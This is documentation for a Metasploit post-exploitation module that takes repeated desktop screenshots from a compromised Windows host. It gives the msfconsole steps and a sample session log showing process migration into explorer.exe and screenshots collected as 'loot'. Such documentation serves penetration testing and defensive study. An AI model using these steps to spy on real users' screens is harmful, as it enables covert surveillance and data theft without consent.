## Vulnerable Application This module will incrementally take desktop screenshots from the host. This allows for screen spying which can be useful to determine if there is an active user on a machine, or to record the screen for later data extraction. Note: As of March, 2014, the `VIEW_CMD` option has been removed in favor of the Boolean `VIEW_SCREENSHOTS` option, which will control if (but not how) the collected screenshots will be viewed from the Metasploit interface. ## Verification Steps 1. Start msfconsole 2. Get meterpreter session 3. Do: ```use post/windows/gather/screen_spy``` 4. Do: ```set SESSION ``` 5. Do: ```run``` ## Options **SESSION** The session to run the module on. ## Scenarios ### Windows 7 (6.1 Build 7601, Service Pack 1). ``` [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700 msf > use post/windows/gather/screen_spy msf post(windows/gather/screen_spy) > set SESSION 1 SESSION => 1 msf post(windows/gather/screen_spy) > run [*] Migrating to explorer.exe pid: 1908 [+] Migration successful [*] Capturing 6 screenshots with a delay of 5 seconds [*] Screen Spying Complete [*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot [*] Post module execution completed ```